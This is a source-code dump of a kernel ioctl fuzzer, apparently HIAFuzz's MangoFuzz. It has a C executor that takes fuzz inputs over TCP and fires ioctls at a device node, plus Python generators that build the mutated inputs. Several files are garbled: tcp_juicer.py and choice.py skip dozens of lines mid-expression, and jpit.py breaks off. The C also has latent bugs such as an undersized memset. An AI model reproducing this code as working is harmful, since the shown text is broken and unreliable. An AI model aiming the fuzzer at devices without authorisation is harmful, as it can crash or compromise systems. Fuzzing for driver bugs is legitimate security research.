map_entry_t_arr, blobs 16 | */ 17 | int debug = 0; 18 | 19 | typedef struct { 20 | int src_id; 21 | int dst_id; 22 | int offset; 23 | } map_entry_t; 24 | 25 | short tiny_vals[18] = {128, 127, 64, 63, 32, 31, 16, 15, 8, 7, 4, 3, 2, 1, 0, 256, 255, -1}; 26 | int *small_vals; 27 | int num_small_vals; 28 | 29 | // populates small_vals when called 30 | void populate_arrs(int top) { 31 | int num = 1; 32 | int count = 0; 33 | while (num < top) { 34 | //printf("%d\n", num); 35 | num <<= 1; 36 | count += 2; 37 | } 38 | // top 39 | count += 1; 40 | // -1 41 | count += 1; 42 | num_small_vals = count; 43 | num >>= 1; 44 | 45 | small_vals = malloc(sizeof(int)*count); 46 | memset(small_vals, 0, count); 47 | 48 | int i = 0; 49 | while(num > 1) { 50 | small_vals[i] = num; 51 | i++; 52 | small_vals[i] = num-1; 53 | i++; 54 | num >>= 1; 55 | } 56 | small_vals[i] = 0; 57 | small_vals[i+1] = top; 58 | small_vals[i+2] = top-1; 59 | small_vals[i+3] = -1; 60 | } 61 | 62 | // generate a random value of size size and store it in elem. 63 | // value has a weight % chance to be a "small value" 64 | void gen_rand_val(int size, char *elem, int small_weight) { 65 | int i; 66 | 67 | if ((rand() % 100) < small_weight) { 68 | // do small thing 69 | unsigned int idx = (rand() % num_small_vals); 70 | printf("Choosing %d\n", small_vals[idx]); 71 | switch (size) { 72 | case 2: 73 | idx = (rand() % 18); 74 | *(short *)elem = tiny_vals[idx]; 75 | break; 76 | case 4: 77 | *(int *)elem = small_vals[idx]; 78 | break; 79 | 80 | case 8: 81 | *(long long*)elem = small_vals[idx]; 82 | break; 83 | 84 | default: 85 | printf("Damn bro. Size: %d\n", size); 86 | exit(-1); 87 | } 88 | } 89 | 90 | else { 91 | 92 | for(i=0; i < size; i++) { 93 | elem[i] = (char)(rand()%0x100); 94 | } 95 | } 96 | 97 | } 98 | 99 | int main(int argc , char *argv[]) 100 | { 101 | int num_blobs = 0, num_mappings = 0, i = 0, dev_name_len = 0, j; 102 | unsigned int ioctl_id = 0; 103 | char *dev_name; 104 | void *tmp; 105 | char **ptr_arr; 106 | int *len_arr; 107 | unsigned int seed; 108 | 109 | int sockfd , client_sock , c , read_size; 110 | struct sockaddr_in server , client; 111 | int msg_size; 112 | void *generic_arr[264]; 113 | 114 | // max val for small_vals array 115 | int top = 8192; 116 | // chance that our generics are filled with "small vals" 117 | int default_weight = 50; 118 | populate_arrs(top); 119 | int retest = 0; 120 | if (argc != 2) { 121 | printf("Usage: %s \n", argv[0]); 122 | return -1; 123 | } 124 | if (argc > 2) { 125 | retest = 1; 126 | goto rerun; 127 | } 128 | 129 | 130 | 131 | sockfd = socket(AF_INET , SOCK_STREAM , 0); 132 | if (sockfd == -1) 133 | { 134 | printf("Could not create socket"); 135 | } 136 | puts("Socket created"); 137 | 138 | setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int)); 139 | 140 | server.sin_family = AF_INET; 141 | server.sin_addr.s_addr = INADDR_ANY; 142 | server.sin_port = htons(atoi(argv[1])); 143 | 144 | //Bind 145 | if( bind(sockfd,(struct sockaddr *)&server , sizeof(server)) < 0) 146 | { 147 | //print the error message 148 | perror("bind failed. Error"); 149 | return 1; 150 | } 151 | puts("bind done"); 152 | listen: 153 | // Listen 154 | listen(sockfd , 3); 155 | 156 | puts("Waiting for incoming connections..."); 157 | c = sizeof(struct sockaddr_in); 158 | 159 | // accept connection from an incoming client 160 | client_sock = accept(sockfd, (struct sockaddr *)&client, (socklen_t*)&c); 161 | if (client_sock < 0) 162 | { 163 | perror("accept failed"); 164 | return 1; 165 | } 166 | puts("Connection accepted"); 167 | 168 | msg_size = 0; 169 | // Receive a message from client 170 | while( (read_size = recv(client_sock , &msg_size , 4 , 0)) > 0 ) 171 | { 172 | // recv the entire message 173 | char *recv_buf = calloc(msg_size, sizeof(char)); 174 | if (recv_buf == NULL) { 175 | printf("Failed to allocate recv_buf\n"); 176 | exit(-1); 177 | } 178 | 179 | int nrecvd = recv(client_sock, recv_buf, msg_size, 0); 180 | if (nrecvd != msg_size) { 181 | printf("Error getting all data!\n"); 182 | printf("nrecvd: %d\nmsg_size:%d\n", nrecvd, msg_size); 183 | exit(-1); 184 | } 185 | // quickly save a copy of the most recent data 186 | int savefd = open("/sdcard/saved", O_WRONLY|O_TRUNC|O_CREAT, 0644); 187 | if (savefd < 0) { 188 | perror("open saved"); 189 | exit(-1); 190 | } 191 | 192 | int err = write(savefd, recv_buf, msg_size); 193 | if (err != msg_size) { 194 | perror("write saved"); 195 | exit(-1); 196 | } 197 | fsync(savefd); 198 | close(savefd); 199 | rerun: 200 | if (retest) { 201 | recv_buf = calloc(msg_size, sizeof(char)); 202 | int fd = open("/sdcard/saved", O_RDONLY); 203 | if (fd < 0) { 204 | perror("open:"); 205 | exit(-1); 206 | } 207 | int fsize = lseek(fd, 0, SEEK_END); 208 | printf("file size: %d\n", fsize); 209 | lseek(fd, 0, SEEK_SET); 210 | read(fd, recv_buf, fsize); 211 | } 212 | 213 | char *head = recv_buf; 214 | seed = 0; 215 | //seed, ioctl_id, num_mappings, num_blobs, dev_name_len, dev_name, map_entry_t_arr, blob_len_arr, blobs 216 | memcpy(&seed, head, 4); 217 | head += 4; 218 | memcpy(&ioctl_id, head, 4); 219 | head += 4; 220 | memcpy(&num_mappings, head, 4); 221 | head += 4; 222 | memcpy(&num_blobs, head, 4); 223 | head += 4; 224 | memcpy(&dev_name_len, head, 4); 225 | head += 4; 226 | 227 | // srand with new seed 228 | srand(seed); 229 | 230 | /* dev name */ 231 | dev_name = calloc(dev_name_len+1, sizeof(char)); 232 | if (dev_name == NULL) { 233 | printf("Failed to allocate dev_name\n"); 234 | exit(-1); 235 | } 236 | memcpy(dev_name, head, dev_name_len); 237 | head += dev_name_len; 238 | 239 | /* map */ 240 | map_entry_t *map = calloc(num_mappings, sizeof(map_entry_t)); 241 | if (map == NULL) { 242 | printf("Failed to allocate map\n"); 243 | exit(-1); 244 | } 245 | 246 | if (num_mappings != 0) { 247 | memcpy(map, head, num_mappings*sizeof(map_entry_t)); 248 | head += num_mappings*sizeof(map_entry_t); 249 | } 250 | 251 | /* blobs */ 252 | 253 | // first create an array to store the sizes themselves 254 | len_arr = calloc(num_blobs, sizeof(int)); 255 | if (len_arr == NULL) { 256 | printf("Failed to allocate len_arr\n"); 257 | exit(-1); 258 | } 259 | 260 | // we'll also want an array to store our pointers 261 | ptr_arr = calloc(num_blobs, sizeof(void *)); 262 | if (ptr_arr == NULL) { 263 | printf("Failed to allocate ptr_arr\n"); 264 | exit(-1); 265 | } 266 | 267 | 268 | // copy the blob sizes into our size_arr 269 | for (j=0; j < num_blobs; j++) { 270 | memcpy(&len_arr[j], head, sizeof(int)); 271 | head += sizeof(int); 272 | } 273 | 274 | // we'll also want memory bufs for all blobs 275 | // now that we have the sizes, allocate all the buffers we need 276 | for (j=0; j < num_blobs; j++) { 277 | ptr_arr[j] = calloc(len_arr[j], sizeof(char)); 278 | //printf("just added %p to ptr_arr\n", ptr_arr[j]); 279 | if (ptr_arr[j] == NULL) { 280 | printf("Failed to allocate a blob store\n"); 281 | exit(-1); 282 | } 283 | 284 | // might as well copy the memory over as soon as we allocate the space 285 | memcpy((char *)ptr_arr[j], head, len_arr[j]); 286 | head += len_arr[j]; 287 | } 288 | 289 | int num_generics = 0; 290 | 291 | // time for pointer fixup 292 | for (i=0; i < num_mappings; i++) { 293 | // get out entry 294 | map_entry_t entry = map[i]; 295 | // pull out the struct to be fixed up 296 | char *tmp = ptr_arr[entry.src_id]; 297 | 298 | // check if this is a struct ptr or just a generic one 299 | 300 | // just a generic one 301 | if (entry.dst_id < 0) { 302 | // 90% chance we fixup the generic 303 | if ( (rand() % 10) > 0) { 304 | int buf_len = 128; 305 | char *tmp_generic = malloc(buf_len); 306 | memset(tmp_generic, 0, buf_len); 307 | // 95% chance we fill it with data 308 | if ((rand() % 100) > 95) { 309 | // if dst_id is < 0, it's abs value is the element size 310 | int size = -1 * entry.dst_id; 311 | int weight; 312 | // if it's a char or some float, never choose a "small val" 313 | if (size == 1 || size > 8) 314 | weight = 0; 315 | else 316 | weight = default_weight; 317 | 318 | for (i=0; i < buf_len; i+=size) { 319 | gen_rand_val(size, &tmp_generic[i], weight); 320 | } 321 | } 322 | generic_arr[num_generics] = tmp_generic; 323 | memcpy(tmp+entry.offset, &tmp_generic, sizeof(void *)); 324 | num_generics += 1; 325 | if (num_generics >= 264) { 326 | printf("Code a better solution for storing generics\n"); 327 | exit(1); 328 | } 329 | } 330 | } 331 | 332 | // a struct ptr, so we have the data 333 | else { 334 | // 1 in 400 chance we don't fixup 335 | if ( (rand() % 400) > 0) { 336 | // now point it to the correct struct/blob 337 | // printf("placing %p, at %p\n", ptr_arr[entry.dst_id], tmp+entry.offset); 338 | memcpy(tmp+entry.offset, &ptr_arr[entry.dst_id], sizeof(void *)); 339 | } 340 | } 341 | } 342 | 343 | if (debug) { 344 | printf("ioctl_id: %d\n", ioctl_id); 345 | printf("num_mappings: %d\n", num_mappings); 346 | printf("num_blobs: %d\n", num_blobs); 347 | printf("dev_name_len: %d\n", dev_name_len); 348 | printf("dev_name: %s\n", dev_name); 349 | } 350 | 351 | // time for the actual ioctl 352 | int fd = open(dev_name, O_RDONLY); 353 | if (fd < 0) { 354 | perror("open"); 355 | exit(-1); 356 | } 357 | fflush(stdout); 358 | if ((ioctl(fd, ioctl_id, ptr_arr[0])) == -1) 359 | perror("ioctl"); 360 | 361 | else 362 | printf("good hit\n"); 363 | close(fd); 364 | 365 | if (retest) 366 | exit(0); 367 | 368 | fflush(stdout); 369 | // okay now free all the shit we alloced 370 | free(recv_buf); 371 | free(dev_name); 372 | if (map != NULL) 373 | free(map); 374 | free(len_arr); 375 | for (i=0; i < num_blobs; i++) { 376 | //printf("%d: free'ing %p\n", i, ptr_arr[i]); 377 | free(ptr_arr[i]); 378 | } 379 | free(ptr_arr); 380 | for (i=0; i < num_generics; i++) { 381 | free(generic_arr[i]); 382 | } 383 | 384 | write(client_sock, &msg_size, 4); 385 | 386 | msg_size = 0; 387 | } 388 | 389 | if(read_size == 0) 390 | { 391 | puts("Client disconnected"); 392 | fflush(stdout); 393 | close(client_sock); 394 | goto listen; 395 | } 396 | else if(read_size == -1) 397 | { 398 | perror("recv failed"); 399 | } 400 | 401 | return 0; 402 | } 403 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/datadancer/HIAFuzz/c986d9c9fca140df0446da58f100bd1c6c985b82/MangoFuzz/fuzzer/__init__.py -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/blenders/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | This package contains all Blenders that are available. 3 | """ 4 | from ..utils import rotten_peel 5 | from num_blender import NumBlender 6 | from string_blender import StringBlender 7 | from blob_blender import BlobBlender 8 | 9 | 10 | class BlenderFactory(object): 11 | """ 12 | Class that implements factory pattern for set of Blenders. 13 | This is used to access different Blenders. 14 | """ 15 | all_blenders = [] 16 | 17 | def __init__(self, engine_obj): 18 | """ 19 | Initialize all available blenders with the provided engine object. 20 | :param engine_obj: The engine object that should be used to 21 | initialize the available blenders. 22 | :return: None 23 | """ 24 | assert engine_obj is not None, "Engine object cannot be None" 25 | if len(BlenderFactory.all_blenders) == 0: 26 | # add number blender 27 | curr_blender = NumBlender(engine_obj) 28 | BlenderFactory.all_blenders.append(curr_blender) 29 | # add string blender. 30 | curr_blender = StringBlender(engine_obj) 31 | BlenderFactory.all_blenders.append(curr_blender) 32 | # add blob blender 33 | curr_blender = BlobBlender(engine_obj) 34 | BlenderFactory.all_blenders.append(curr_blender) 35 | else: 36 | rotten_peel("Blender factory is already initialized.") 37 | 38 | def getAllBlenders(self): 39 | """ 40 | Get list of all available Blenders 41 | :return: list of Blender objects. 42 | """ 43 | return list(BlenderFactory.all_blenders) 44 | 45 | def getMatchingBlenders(self, type_name): 46 | """ 47 | Get the list of Blenders which can handle provided type. 48 | :param type_name: Interested type name 49 | :return: list of Blenders that can handle the type. 50 | """ 51 | to_ret = list(filter(lambda x: x is not None and x.canHandle(type_name), BlenderFactory.all_blenders)) 52 | return to_ret 53 | 54 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/blenders/blender.py: -------------------------------------------------------------------------------- 1 | import random 2 | import string 3 | 4 | class Blender(object): 5 | 6 | def __init__(self, engine_obj): 7 | """ 8 | Create the new Blender object. 9 | :param engine_obj: the target engine object to be used by the Blender. 10 | """ 11 | self.curr_engine = engine_obj 12 | 13 | def getRandBytes(self, num_bytes=None): 14 | if num_bytes is None: 15 | num_bytes = random.randint(1, 1024) 16 | data = '' 17 | for x in range(num_bytes): 18 | data += chr(random.randint(0, 0xff)) 19 | return data 20 | 21 | def getRandNum(self, bit_size): 22 | val = random.randint(0, 2**bit_size-1) 23 | return val 24 | 25 | def getRandString(self, str_len): 26 | target_len = int(str_len) 27 | if target_len <= 0: 28 | target_len = 4 29 | return ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) 30 | for _ in range(target_len)) 31 | 32 | 33 | def getSupportedTypes(self): 34 | """ 35 | Gets all the supported types by this Blender. 36 | :return: list of type names it supports. 37 | """ 38 | raise NotImplementedError("Not implemented") 39 | 40 | def blend(self, old_data, *additional_data): 41 | """ 42 | Performs the mutation. 43 | Given old value and optional additional data, 44 | it performs mutation and returns new value. 45 | :param old_data: old data or None 46 | :param additional_data: optional var args specific to each mutator. 47 | :return: New mutated data. 48 | """ 49 | raise NotImplementedError("Not implemented") 50 | 51 | def canHandle(self, target_type): 52 | """ 53 | This function checks if this Punker can handle the provided type or not. 54 | :param target_type: interested type. 55 | :return: true/false depending on whether the mutator can handle this or not. 56 | """ 57 | raise NotImplementedError("Not implemented") 58 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/blenders/blob_blender.py: -------------------------------------------------------------------------------- 1 | from blender import Blender 2 | import random 3 | from ..utils import * 4 | 5 | 6 | class BlobBlender(Blender): 7 | """ 8 | Blob Blender. 9 | This generates random blobs of different data types (arrays). 10 | This is primarly to be used for creating blobs for generic data pointers. 11 | """ 12 | supported_types = ["Blob"] 13 | 14 | def __init__(self, engine_obj): 15 | super(BlobBlender, self).__init__(engine_obj) 16 | thick_peel("Created a BlobBlender") 17 | 18 | def getSupportedTypes(self): 19 | return list(BlobBlender.supported_types) 20 | 21 | def blend(self, old_data, *additional_data): 22 | # we expect the base type to be an arg 23 | if len(additional_data) == 2: 24 | base_type = additional_data[0] 25 | elem_size = additional_data[1] 26 | else: 27 | rotten_peel("BlobBlender called with incorrect number of args!") 28 | 29 | data = None 30 | # for now, just be stupid 31 | if base_type == "void": 32 | data = "\xcc"*20 33 | 34 | else: 35 | size = random.randint(1,256) 36 | data = self.getRandBytes(size) 37 | 38 | return data 39 | 40 | def canHandle(self, target_type): 41 | return target_type in BlobBlender.supported_types 42 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/blenders/num_blender.py: -------------------------------------------------------------------------------- 1 | from blender import Blender 2 | import random 3 | from ..utils import * 4 | 5 | 6 | class NumBlender(Blender): 7 | """ 8 | Number Blender. 9 | This generates random number of provided size. 10 | """ 11 | supported_types = ["Number"] 12 | 13 | def __init__(self, engine_obj): 14 | super(NumBlender, self).__init__(engine_obj) 15 | thick_peel("Created a NumBlender") 16 | 17 | def getSupportedTypes(self): 18 | return list(NumBlender.supported_types) 19 | 20 | def blend(self, old_data, *additional_data): 21 | # this guy expects the number of bytes to be one 22 | # of the argument 23 | if len(additional_data) > 0: 24 | num_bits = additional_data[0] 25 | else: 26 | # if no size is provided they use a default size 27 | num_bits = 32 28 | thick_peel("Called NumBlender without size, defaulting to:%d", num_bits) 29 | to_ret = None 30 | small_sizes = [1, 8, 16, 32, 64, 128, 512, 1024, 7, 15, 31, 63, 127, 511, 1012] 31 | #tiny_sizes = [1, 8, 16, 32, 64, 128, 255, 7, 15, 63, 127] 32 | tiny_sizes = [128, 127, 64, 63, 32, 31, 16, 15, 8, 7, 4, 3, 2, 1, 0, 255, -1] 33 | 34 | chance = random.random() 35 | # 10% chance to be 0 36 | if chance < .10: 37 | to_ret = 0 38 | elif chance < .20: 39 | to_ret = -1 40 | # 30% chance to be a small number 41 | elif chance < .50: 42 | if num_bits == 8: 43 | to_ret = random.choice(tiny_sizes) 44 | else: 45 | to_ret = random.choice(small_sizes) 46 | # 50% chance to be a bigass number (probably) 47 | else: 48 | to_ret = self.getRandNum(num_bits) 49 | return to_ret 50 | 51 | def canHandle(self, target_type): 52 | return target_type in NumBlender.supported_types 53 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/blenders/string_blender.py: -------------------------------------------------------------------------------- 1 | from blender import Blender 2 | from ..utils import * 3 | import random 4 | 5 | 6 | class StringBlender(Blender): 7 | """ 8 | String Blender. 9 | This generates random string of provided size. 10 | """ 11 | supported_types = ["String"] 12 | 13 | def __init__(self, engine_obj): 14 | super(StringBlender, self).__init__(engine_obj) 15 | thick_peel("Created a StringBlender") 16 | 17 | def getSupportedTypes(self): 18 | return list(StringBlender.supported_types) 19 | 20 | def blend(self, old_data, *additional_data): 21 | # this guy expects the number of bytes to be one 22 | # of the argument 23 | if len(additional_data) > 0: 24 | num_bytes = int(additional_data[0]) 25 | else: 26 | num_bytes = random.randint(1, 1024) 27 | thick_peel("Called StringBlender without size, using:%d", num_bytes) 28 | # generate random string. 29 | to_ret = '' 30 | for x in range(num_bytes): 31 | to_ret += chr(random.randint(0, 0xff)) 32 | 33 | return to_ret 34 | 35 | def canHandle(self, target_type): 36 | return target_type in StringBlender.supported_types 37 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/engine.py: -------------------------------------------------------------------------------- 1 | """ 2 | This is the central engine that contains all the global 3 | data that is needed by various components. 4 | """ 5 | import random 6 | import time 7 | import string 8 | from utils import * 9 | from blenders import BlenderFactory 10 | import juicers 11 | import sys 12 | 13 | class Engine(object): 14 | """ 15 | The global engine object. 16 | which will be used by everyone. 17 | """ 18 | 19 | def __init__(self, initial_seed=None): 20 | """ 21 | Create a new engine object. 22 | :param initial_seed: The initial seed to be used by Engine. 23 | """ 24 | if initial_seed is not None: 25 | self.initial_seed = int(initial_seed) 26 | normal_peel("Provided initial seed=%d", self.initial_seed) 27 | else: 28 | self.initial_seed = int(time.time()) 29 | raw_peel("No initial seed provided, using seed=%d", self.initial_seed) 30 | random.seed(self.initial_seed) 31 | self.pits = [] 32 | self.iters = 0 33 | self.blender_factory = BlenderFactory(self) 34 | self.juicer = None 35 | 36 | def getPit(self, name): 37 | for pit in self.pits: 38 | if pit.name == name: 39 | return pit 40 | return None 41 | 42 | def addPit(self, jpit): 43 | name = jpit.name 44 | if self.getPit(name) != None: 45 | rotten_peel("Trying to add repeated pit: %s", name) 46 | self.pits.append(jpit) 47 | 48 | def run(self, juicer_type, num_tests, pit_name=None, **kwargs): 49 | 50 | if self.juicer is None: 51 | supported_jtypes = juicers.getSupportedJtypes() 52 | if juicer_type not in supported_jtypes: 53 | rotten_peel("Juicer type %s not supported!", juicer_type) 54 | 55 | juicer_ = juicers.get_juicer(juicer_type) 56 | my_juicer = juicer_(**kwargs) 57 | self.juicer = my_juicer 58 | 59 | else: 60 | my_juicer = self.juicer 61 | 62 | if num_tests is None: 63 | num_tests = sys.maxint 64 | 65 | for x in xrange(num_tests): 66 | if pit_name == None: 67 | pit = random.choice(self.pits) 68 | else: 69 | pit = self.getPit(pit_name) 70 | if pit == None: 71 | rotten_peel("Provided name does not correspond to a valid pit: %s", pit_name) 72 | blob_arr, map_arr = pit.run() 73 | my_juicer.send(blob_arr, map_arr, pit.target_struct, pit.devname, int(pit.ioctl_id)) 74 | self.iters += 1 75 | 76 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/juicers/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | This package contains all the juicers. 3 | Juicers are the elements which produces 4 | the juice or in other words the output. 5 | """ 6 | from globs import getSupportedJtypes, registerJtype, get_juicer, supported_jtypes 7 | from hexify_juicer import HexifyJuicer 8 | from tcp_juicer import TcpJuicer 9 | from ..utils import * 10 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/juicers/globs.py: -------------------------------------------------------------------------------- 1 | supported_jtypes = {} 2 | 3 | def getSupportedJtypes(): 4 | return supported_jtypes.keys() 5 | 6 | def get_juicer(jtype): 7 | try: 8 | return supported_jtypes[jtype] 9 | except KeyError: 10 | return None 11 | 12 | def registerJtype(jtype, jclass): 13 | supported_jtypes[jtype] = jclass 14 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/juicers/hexify_juicer.py: -------------------------------------------------------------------------------- 1 | from juicer import Juicer 2 | from . import registerJtype 3 | 4 | 5 | class HexifyJuicer(Juicer): 6 | """ 7 | This juicer converts the provided juice into hex string. 8 | """ 9 | def __init__(self, console_print=True): 10 | self.console_print = console_print 11 | self.jtype = 'hex' 12 | 13 | def juice(self, target_juice): 14 | # TODO: 15 | to_ret = None 16 | if self.console_print: 17 | # TODO: print the output in hex on console 18 | pass 19 | # TODO: convert into hex string 20 | return to_ret 21 | 22 | def getName(self): 23 | return "hexify" 24 | 25 | 26 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/juicers/juicer.py: -------------------------------------------------------------------------------- 1 | class Juicer(object): 2 | """ 3 | Main class for all juicers. 4 | """ 5 | def __init__(self, name): 6 | self.name = name 7 | 8 | def juice(self, target_juice): 9 | """ 10 | This is the main function that processes the provided 11 | target object. 12 | :param target_juice: The target object which needs to be processed by the juicer. 13 | :return: Depends on the specific juicers. 14 | """ 15 | raise NotImplementedError("Function not implemented.") 16 | 17 | def getName(self): 18 | """ 19 | This function returns the name of this juicer. 20 | :return: String representing name of this juicer. 21 | """ 22 | raise NotImplementedError("Function not implemented.") 23 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/juicers/tcp_juicer.py: -------------------------------------------------------------------------------- 1 | from juicer import Juicer 2 | from . import registerJtype 3 | import socket 4 | import time 5 | import random 6 | import struct 7 | from ..utils import * 8 | 9 | p = lambda x: struct.pack(" 0: 33 | to_ret = True 34 | return to_ret 35 | 36 | def jucify(self): 37 | """ 38 | Jucify using the provided mango config. 39 | :return: True if every thing goes fine else false 40 | """ 41 | to_ret = False 42 | # TODO: finish this 43 | return to_ret 44 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/mango_types/__init__.py: -------------------------------------------------------------------------------- 1 | from data_guys import DataElement, DataModel 2 | from jpit import JPit 3 | from block import Block 4 | from number import Number 5 | from strings import String 6 | from pointer import Pointer 7 | from choice import Choice, Enum, Union 8 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/mango_types/block.py: -------------------------------------------------------------------------------- 1 | from data_guys import DataElement 2 | import random 3 | 4 | class Block(DataElement): 5 | 6 | def __init__(self, name, engine, parent=None, ref=None, occurs=1): 7 | DataElement.__init__(self, name, engine, parent) 8 | self.data_type = "Block" 9 | # is this a reference to another DM? 10 | self.ref = ref 11 | if ref is None: 12 | self.is_ref = False 13 | else: 14 | self.is_ref = True 15 | self.ref.parent = self 16 | 17 | self.occurs = occurs 18 | if occurs > 1: 19 | self.is_array = True 20 | self.min_occurs = occurs 21 | self.max_occurs = occurs 22 | else: 23 | self.is_array = False 24 | 25 | def copy(self, visited=None): 26 | if visited is None: 27 | visited = [] 28 | visited.append(self) 29 | new_block = Block(self.name, self.engine, self.parent, self.ref, self.occurs) 30 | 31 | for child in self: 32 | new_block.addChild(child.copy(visited)) 33 | 34 | visited.remove(self) 35 | return new_block 36 | 37 | def generate(self): 38 | # target_data, additional_blobs, target_mappings, child_mappings 39 | our_data = '' 40 | to_ret_blobs = {} 41 | our_mappings = {} 42 | additional_mappings = {} 43 | 44 | # if we're a ref, call generate() on whatever DM we're a ref to 45 | if self.is_ref: 46 | #target_data, additional_blobs, target_mappings, child_mappings = self.ref.generate() 47 | stuff = self.ref.generate() 48 | self.value = stuff[0] 49 | return stuff 50 | 51 | for child in self: 52 | child_data, child_additional_blobs, child_data_mappings, child_blob_mappings = child.generate() 53 | # get the child offset in our data 54 | child_offset = len(our_data) 55 | # add the child data to our data 56 | our_data += child_data 57 | # get a blob id for the child data 58 | child_blob_id = child.name + '_' + str(id(child)) 59 | # update to_ret_blobs with any additional child_blobs 60 | to_ret_blobs.update(child_additional_blobs) 61 | if len(child_data_mappings) > 0: 62 | for child_mapping_offset in child_data_mappings: 63 | our_mappings[child_offset+child_mapping_offset] = child_data_mappings[child_mapping_offset] 64 | 65 | # add the childs blob mappings to our additional mappings 66 | additional_mappings.update(child_blob_mappings) 67 | self.value = our_data 68 | return our_data, to_ret_blobs, our_mappings, additional_mappings 69 | 70 | def blend(self): 71 | target_data = '' 72 | to_ret_blobs = dict() 73 | target_data_mappings = dict() 74 | target_blob_mappings = dict() 75 | for child in self: 76 | child_data, child_blobs, child_data_mappings, child_blob_mappings = child.blend() 77 | child_index = len(target_data) 78 | # add child data 79 | target_data += child_data 80 | # add blobs 81 | to_ret_blobs.update(child_blobs) 82 | # if there are any mappings for the child data 83 | if len(child_data_mappings) != 0: 84 | # update the mapping using child index. 85 | for curr_offset in child_data_mappings: 86 | target_data_mappings[curr_offset + child_index] = child_data_mappings[curr_offset] 87 | 88 | # Add child blob mappings 89 | target_blob_mappings.update(child_blob_mappings) 90 | 91 | return target_data, to_ret_blobs, target_data_mappings, target_blob_mappings 92 | 93 | def getSizeBytes(self): 94 | if self.is_ref: 95 | return self.ref.size 96 | else: 97 | size = 0 98 | for child in self: 99 | size += child.getSizeBytes() 100 | return size 101 | 102 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/mango_types/choice.py: -------------------------------------------------------------------------------- 1 | from data_guys import DataElement 2 | import random 3 | import struct 4 | 5 | class Choice(DataElement): 6 | 7 | def __init__(self, name, num_choices, choice_type, engine, parent=None): 8 | DataElement.__init__(self, name, engine, parent) 9 | self.data_type = "Choice" 10 | # Number of choices 11 | self.num_choices = num_choices 12 | # enum or union 13 | self.choice_type = choice_type 14 | 15 | def copy(self, visited=None): 16 | if visited is None: 17 | visited = [] 18 | visited.append(self) 19 | new_choice = Choice(self.name, self.num_choices, self.choice_type, self.engine, self.parent) 20 | new_choice.data_type = "Choice" 21 | 22 | for thing in self: 23 | new_choice.addChild(thing.copy(visited)) 24 | visited.remove(self) 25 | return new_choice 26 | 27 | def getSizeBytes(self): 28 | some_choice = self.children[0] 29 | return some_choice.getSizeBytes() 30 | 31 | 32 | class Enum(Choice): 33 | 34 | def __init__(self, name, num_choices, choice_type, engine, parent=None): 35 | Choice.__init__(self, name, num_choices, choice_type, engine, parent) 36 | self.data_type = "Enum" 37 | 38 | def copy(self, visited=None): 39 | if visited is None: 40 | visited = [] 41 | visited.append(self) 42 | new_enum = Enum(self.name, self.num_choices, self.choice_type, self.engine, self.parent) 43 | new_enum.data_type = "Enum" 44 | 45 | for thing in self: 46 | new_enum.addChild(thing.copy(visited)) 47 | visited.remove(self) 48 | return new_enum 49 | 50 | # all enum choices should have default vals 51 | def generate(self): 52 | # 5% chance to be something other than one of the predefined vals 53 | if random.random() < 0.05: 54 | size = self[0][0].bit_size 55 | val = random.randint(0, 2**size-1) 56 | 57 | else: 58 | val = random.choice(self)[0].default_val 59 | 60 | self.value = val 61 | if val < 1 or val >= 0x7fffffff: 62 | fmt = " 0: 124 | for ele_data_offset in ele_mappings: 125 | our_mappings[ele_offset + ele_data_offset] = ele_mappings[ele_data_offset] 126 | 127 | # add the ele_blob_mappings to our additional mappings 128 | additional_mappings.update(ele_blob_mappings) 129 | 130 | return our_data, our_blobs, our_mappings, additional_mappings 131 | 132 | def getValue(self): 133 | cur_data = '' 134 | for e in self.elements: 135 | cur_data += e.demandValue() 136 | return cur_data 137 | -------------------------------------------------------------------------------- /MangoFuzz/fuzzer/mango_types/jpit.py: -------------------------------------------------------------------------------- 1 | from data_guys import DataModel 2 | from mapping import Mapping 3 | from ..utils import rotten_peel 4 | 5 | 6 | class JPit(object): 7 | def __init__(self, name): 8 | self.name = name 9 | self.main_struct = None 10 | self.data_models = [] 11 | self.ioctl_id = None 12 | self.devname = None 13 | self.target_struct = None 14 | 15 | def __getitem__(self, idx): 16 | return self.data_models[idx] 17 | 18 | def __len__(self): 19 | return len(self.data_models) 20 | 21 | def findDataModel(self, dm_name): 22 | for dm in self.data_models: 23 | if dm.name == dm_name: 24 | return dm 25 | return None 26 | 27 | def addChild(self, dm): 28 | if isinstance(dm, DataModel): 29 | self.data_models.append(dm) 30 | dm.parent = self 31 | else: 32 | rotten_peel("Trying to add a non DataModel to a JPit") 33 | 34 | def run(self): 35 | assert self.target_struct is not None 36 | dm_to_gen = self.findDataModel(self.target_struct) 37 | if dm_to_gen is None: 38 | rotten_peel("Couldn't find DataModel: %s when trying to Run!", self.target_struct) 39 | data, blobs, data_mappings, blob_mappings = dm_to_gen.generate() 40 | 41 | blob_arr = [] 42 | id_idx = {} 43 | blob_arr.append(data) 44 | i = 1 45 | for b_id in blobs: 46 | blob = blobs[b_id] 47 | id_idx[b_id] = i 48 | blob_arr.append(blob) 49 | i += 1 50 | 51 | map_arr = [] 52 | for offset in data_mappings: 53 | # main guy 54 | src_id = self.target_struct 55 | blob_id = data_mappings[offset] 56 | dst_idx = id_idx[blob_id] 57 | src_idx = 0 58 | entry = Mapping(blob_id, src_id, src_idx, dst_idx, offset) 59 | map_arr.append(entry) 60 | 61 | for blob_id in blob_mappings: 62 | for offset in blob_mappings[blob_id]: 63 | src_id = blob_id 64 | src_idx = id_idx[blob_id] 65 | dst_id = 